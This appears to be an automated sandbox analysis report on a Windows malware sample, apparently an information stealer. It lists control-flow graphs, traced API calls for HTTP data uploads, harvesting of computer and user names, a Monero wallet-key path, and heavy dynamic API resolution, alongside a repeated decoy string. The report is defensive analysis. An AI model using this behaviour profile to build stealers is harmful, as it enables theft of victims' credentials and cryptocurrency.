                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4729
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB45DD
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: b74f20d2f61302b12c012e0290fefd96d2e6efcca99b700384ed389eb266ac42
                            • Instruction ID: f4387ca42f5b76094b9d0506edd531343b7bd641169caf41d324a3d590c18d5a
                            • Opcode Fuzzy Hash: b74f20d2f61302b12c012e0290fefd96d2e6efcca99b700384ed389eb266ac42
                            • Instruction Fuzzy Hash: 4341E3616C3788EAE624BFAD88E2E9D7F56DF4774DF587046A810663C2CFB0A5034523

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 801 eb4880-eb4942 call eca7a0 call eb47b0 call eca740 * 5 InternetOpenA StrCmpCA 816 eb494b-eb494f 801->816 817 eb4944 801->817 818 eb4ecb-eb4ef3 InternetCloseHandle call ecaad0 call eb9ac0 816->818 819 eb4955-eb4acd call ec8b60 call eca920 call eca8a0 call eca800 * 2 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca920 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca920 call eca8a0 call eca800 * 2 InternetConnectA 816->819 817->816 829 eb4f32-eb4fa2 call ec8990 * 2 call eca7a0 call eca800 * 8 818->829 830 eb4ef5-eb4f2d call eca820 call eca9b0 call eca8a0 call eca800 818->830 819->818 905 eb4ad3-eb4ad7 819->905 830->829 906 eb4ad9-eb4ae3 905->906 907 eb4ae5 905->907 908 eb4aef-eb4b22 HttpOpenRequestA 906->908 907->908 909 eb4b28-eb4e28 call eca9b0 call eca8a0 call eca800 call eca920 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca920 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca920 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca920 call eca8a0 call eca800 call eca740 call eca920 * 2 call eca8a0 call eca800 * 2 call ecaad0 lstrlen call ecaad0 * 2 lstrlen call ecaad0 HttpSendRequestA 908->909 910 eb4ebe-eb4ec5 InternetCloseHandle 908->910 1021 eb4e32-eb4e5c InternetReadFile 909->1021 910->818 1022 eb4e5e-eb4e65 1021->1022 1023 eb4e67-eb4eb9 InternetCloseHandle call eca800 1021->1023 1022->1023 1024 eb4e69-eb4ea7 call eca9b0 call eca8a0 call eca800 1022->1024 1023->910 1024->1021
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EB4839
                              • Part of subcall function 00EB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EB4849
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EB4915
                            • StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB4ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00ED0DDB,00000000,?,?,00000000,?,",00000000,?,00A9E390), ref: 00EB4DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EB4E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EB4E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EB4E49
                            • InternetCloseHandle.WININET(00000000), ref: 00EB4EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00EB4EC5
                            • HttpOpenRequestA.WININET(00000000,00A9E3F0,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB4B15
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • InternetCloseHandle.WININET(00000000), ref: 00EB4ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 04ce4327b0827ccc7f73369672c00c0ff58f504e6722a6225fce0253e8422cbf
                            • Instruction ID: ad7bf3efe8566f245cccb0d0390e62e1c6c36a4cd592c1123f6d9e0a02e320ed
                            • Opcode Fuzzy Hash: 04ce4327b0827ccc7f73369672c00c0ff58f504e6722a6225fce0253e8422cbf
                            • Instruction Fuzzy Hash: 6012FB7291021CABDB18EB90DE96FEEB3B8AF54304F5451ADB10672091DF712F4ACB61
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 00EC792F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 5333c7e3e0fad5c6ec179d330295a511fea4ad3fbf59e154d306a5bcccb1ca62
                            • Instruction ID: aa7d57175555751b346bb3b4cc1ccd9e159f8a94d6e5eb255cb5e94194d951d3
                            • Opcode Fuzzy Hash: 5333c7e3e0fad5c6ec179d330295a511fea4ad3fbf59e154d306a5bcccb1ca62
                            • Instruction Fuzzy Hash: 7D0186B1A08204EFC750DF94D946FAEBBB8F744B21F10421EF985F3680C37659018BA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EB11B7), ref: 00EC7880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EC789F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 638a44fa41076596bbdc96e83120299fa2e7d2ecd1f1e97eccda0b3405e1c4eb
                            • Instruction ID: a3d02c5759a01879a386626104a7c12a49315e6da21e5a3dc309ef41d145e3f4
                            • Opcode Fuzzy Hash: 638a44fa41076596bbdc96e83120299fa2e7d2ecd1f1e97eccda0b3405e1c4eb
                            • Instruction Fuzzy Hash: CDF044B1E44208EFC714DF95DD46FAEBBB8F704721F10015DF645A3680C77915058BA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: fc5d87b164f2fc9683202ffd28efa9b2fe396e1674e2b1ee03c886e5752c2cc3
                            • Instruction ID: 817c7094bd2411c128b4359d16d2b0cfd611ab6db64161a8c32349f85bf8e183
                            • Opcode Fuzzy Hash: fc5d87b164f2fc9683202ffd28efa9b2fe396e1674e2b1ee03c886e5752c2cc3
                            • Instruction Fuzzy Hash: 6ED05E74A0030CDBCB10DFE0D84AADDBB78FB08321F001598D90A73740EA316481CBA5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 ec9c10-ec9c1a 634 eca036-eca0ca LoadLibraryA * 8 633->634 635 ec9c20-eca031 GetProcAddress * 43 633->635 636 eca0cc-eca141 GetProcAddress * 5 634->636 637 eca146-eca14d 634->637 635->634 636->637 638 eca216-eca21d 637->638 639 eca153-eca211 GetProcAddress * 8 637->639 640 eca21f-eca293 GetProcAddress * 5 638->640 641 eca298-eca29f 638->641 639->638 640->641 642 eca2a5-eca332 GetProcAddress * 6 641->642 643 eca337-eca33e 641->643 642->643 644 eca41f-eca426 643->644 645 eca344-eca41a GetProcAddress * 9 643->645 646 eca428-eca49d GetProcAddress * 5 644->646 647 eca4a2-eca4a9 644->647 645->644 646->647 648 eca4dc-eca4e3 647->648 649 eca4ab-eca4d7 GetProcAddress * 2 647->649 650 eca515-eca51c 648->650 651 eca4e5-eca510 GetProcAddress * 2 648->651 649->648 652 eca612-eca619 650->652 653 eca522-eca60d GetProcAddress * 10 650->653 651->650 654 eca67d-eca684 652->654 655 eca61b-eca678 GetProcAddress * 4 652->655 653->652 656 eca69e-eca6a5 654->656 657 eca686-eca699 GetProcAddress 654->657 655->654 658 eca708-eca709 656->658 659 eca6a7-eca703 GetProcAddress * 4 656->659 657->656 659->658
                            APIs
                            • GetProcAddress.KERNEL32(76F70000,00A862E0), ref: 00EC9C2D
                            • GetProcAddress.KERNEL32(76F70000,00A86560), ref: 00EC9C45
                            • GetProcAddress.KERNEL32(76F70000,00A98E50), ref: 00EC9C5E
                            • GetProcAddress.KERNEL32(76F70000,00A98C10), ref: 00EC9C76
                            • GetProcAddress.KERNEL32(76F70000,00A9C030), ref: 00EC9C8E
                            • GetProcAddress.KERNEL32(76F70000,00A9C138), ref: 00EC9CA7
                            • GetProcAddress.KERNEL32(76F70000,00A8AEC8), ref: 00EC9CBF
                            • GetProcAddress.KERNEL32(76F70000,00A9C180), ref: 00EC9CD7
                            • GetProcAddress.KERNEL32(76F70000,00A9C2E8), ref: 00EC9CF0
                            • GetProcAddress.KERNEL32(76F70000,00A9C198), ref: 00EC9D08
                            • GetProcAddress.KERNEL32(76F70000,00A9C228), ref: 00EC9D20
                            • GetProcAddress.KERNEL32(76F70000,00A86300), ref: 00EC9D39
                            • GetProcAddress.KERNEL32(76F70000,00A86340), ref: 00EC9D51
                            • GetProcAddress.KERNEL32(76F70000,00A863E0), ref: 00EC9D69
                            • GetProcAddress.KERNEL32(76F70000,00A865A0), ref: 00EC9D82
                            • GetProcAddress.KERNEL32(76F70000,00A9C0C0), ref: 00EC9D9A
                            • GetProcAddress.KERNEL32(76F70000,00A9C2B8), ref: 00EC9DB2
                            • GetProcAddress.KERNEL32(76F70000,00A8B198), ref: 00EC9DCB
                            • GetProcAddress.KERNEL32(76F70000,00A86520), ref: 00EC9DE3
                            • GetProcAddress.KERNEL32(76F70000,00A9C090), ref: 00EC9DFB
                            • GetProcAddress.KERNEL32(76F70000,00A9C048), ref: 00EC9E14
                            • GetProcAddress.KERNEL32(76F70000,00A9C1B0), ref: 00EC9E2C
                            • GetProcAddress.KERNEL32(76F70000,00A9C0A8), ref: 00EC9E44
                            • GetProcAddress.KERNEL32(76F70000,00A86440), ref: 00EC9E5D
                            • GetProcAddress.KERNEL32(76F70000,00A9C1E0), ref: 00EC9E75
                            • GetProcAddress.KERNEL32(76F70000,00A9C240), ref: 00EC9E8D
                            • GetProcAddress.KERNEL32(76F70000,00A9C168), ref: 00EC9EA6
                            • GetProcAddress.KERNEL32(76F70000,00A9C0D8), ref: 00EC9EBE
                            • GetProcAddress.KERNEL32(76F70000,00A9C1C8), ref: 00EC9ED6
                            • GetProcAddress.KERNEL32(76F70000,00A9C258), ref: 00EC9EEF
                            • GetProcAddress.KERNEL32(76F70000,00A9C0F0), ref: 00EC9F07
                            • GetProcAddress.KERNEL32(76F70000,00A9C108), ref: 00EC9F1F
                            • GetProcAddress.KERNEL32(76F70000,00A9C078), ref: 00EC9F38
                            • GetProcAddress.KERNEL32(76F70000,00A9CBC8), ref: 00EC9F50
                            • GetProcAddress.KERNEL32(76F70000,00A9C1F8), ref: 00EC9F68
                            • GetProcAddress.KERNEL32(76F70000,00A9C2A0), ref: 00EC9F81
                            • GetProcAddress.KERNEL32(76F70000,00A86460), ref: 00EC9F99
                            • GetProcAddress.KERNEL32(76F70000,00A9C060), ref: 00EC9FB1
                            • GetProcAddress.KERNEL32(76F70000,00A864E0), ref: 00EC9FCA
                            • GetProcAddress.KERNEL32(76F70000,00A9C210), ref: 00EC9FE2
                            • GetProcAddress.KERNEL32(76F70000,00A9C120), ref: 00EC9FFA
                            • GetProcAddress.KERNEL32(76F70000,00A864A0), ref: 00ECA013
                            • GetProcAddress.KERNEL32(76F70000,00A86500), ref: 00ECA02B
                            • LoadLibraryA.KERNEL32(00A9C300,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA03D
                            • LoadLibraryA.KERNEL32(00A9C270,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA04E
                            • LoadLibraryA.KERNEL32(00A9C2D0,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA060
                            • LoadLibraryA.KERNEL32(00A9C288,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA072
                            • LoadLibraryA.KERNEL32(00A9C318,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA083
                            • LoadLibraryA.KERNEL32(00A9C150,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA095
                            • LoadLibraryA.KERNEL32(00A9C5E8,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA0A7
                            • LoadLibraryA.KERNEL32(00A9C420,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA0B8
                            • GetProcAddress.KERNEL32(75840000,00A865C0), ref: 00ECA0DA
                            • GetProcAddress.KERNEL32(75840000,00A9C558), ref: 00ECA0F2
                            • GetProcAddress.KERNEL32(75840000,00A989A8), ref: 00ECA10A
                            • GetProcAddress.KERNEL32(75840000,00A9C438), ref: 00ECA123
                            • GetProcAddress.KERNEL32(75840000,00A866E0), ref: 00ECA13B
                            • GetProcAddress.KERNEL32(704F0000,00A8B1E8), ref: 00ECA160
                            • GetProcAddress.KERNEL32(704F0000,00A865E0), ref: 00ECA179
                            • GetProcAddress.KERNEL32(704F0000,00A8B058), ref: 00ECA191
                            • GetProcAddress.KERNEL32(704F0000,00A9C450), ref: 00ECA1A9
                            • GetProcAddress.KERNEL32(704F0000,00A9C5B8), ref: 00ECA1C2
                            • GetProcAddress.KERNEL32(704F0000,00A86840), ref: 00ECA1DA
                            • GetProcAddress.KERNEL32(704F0000,00A86740), ref: 00ECA1F2
                            • GetProcAddress.KERNEL32(704F0000,00A9C4F8), ref: 00ECA20B
                            • GetProcAddress.KERNEL32(760B0000,00A86820), ref: 00ECA22C
                            • GetProcAddress.KERNEL32(760B0000,00A866A0), ref: 00ECA244
                            • GetProcAddress.KERNEL32(760B0000,00A9C588), ref: 00ECA25D
                            • GetProcAddress.KERNEL32(760B0000,00A9C510), ref: 00ECA275
                            • GetProcAddress.KERNEL32(760B0000,00A867C0), ref: 00ECA28D
                            • GetProcAddress.KERNEL32(75D30000,00A8B210), ref: 00ECA2B3
                            • GetProcAddress.KERNEL32(75D30000,00A8AFE0), ref: 00ECA2CB
                            • GetProcAddress.KERNEL32(75D30000,00A9C330), ref: 00ECA2E3
                            • GetProcAddress.KERNEL32(75D30000,00A867E0), ref: 00ECA2FC
                            • GetProcAddress.KERNEL32(75D30000,00A868C0), ref: 00ECA314
                            • GetProcAddress.KERNEL32(75D30000,00A8ADB0), ref: 00ECA32C
                            • GetProcAddress.KERNEL32(753A0000,00A9C378), ref: 00ECA352
                            • GetProcAddress.KERNEL32(753A0000,00A86920), ref: 00ECA36A
                            • GetProcAddress.KERNEL32(753A0000,00A98A08), ref: 00ECA382
                            • GetProcAddress.KERNEL32(753A0000,00A9C4B0), ref: 00ECA39B
                            • GetProcAddress.KERNEL32(753A0000,00A9C408), ref: 00ECA3B3
                            • GetProcAddress.KERNEL32(753A0000,00A86760), ref: 00ECA3CB
                            • GetProcAddress.KERNEL32(753A0000,00A86780), ref: 00ECA3E4
                            • GetProcAddress.KERNEL32(753A0000,00A9C3A8), ref: 00ECA3FC
                            • GetProcAddress.KERNEL32(753A0000,00A9C5D0), ref: 00ECA414
                            • GetProcAddress.KERNEL32(76DA0000,00A86700), ref: 00ECA436
                            • GetProcAddress.KERNEL32(76DA0000,00A9C4C8), ref: 00ECA44E
                            • GetProcAddress.KERNEL32(76DA0000,00A9C3C0), ref: 00ECA466
                            • GetProcAddress.KERNEL32(76DA0000,00A9C468), ref: 00ECA47F
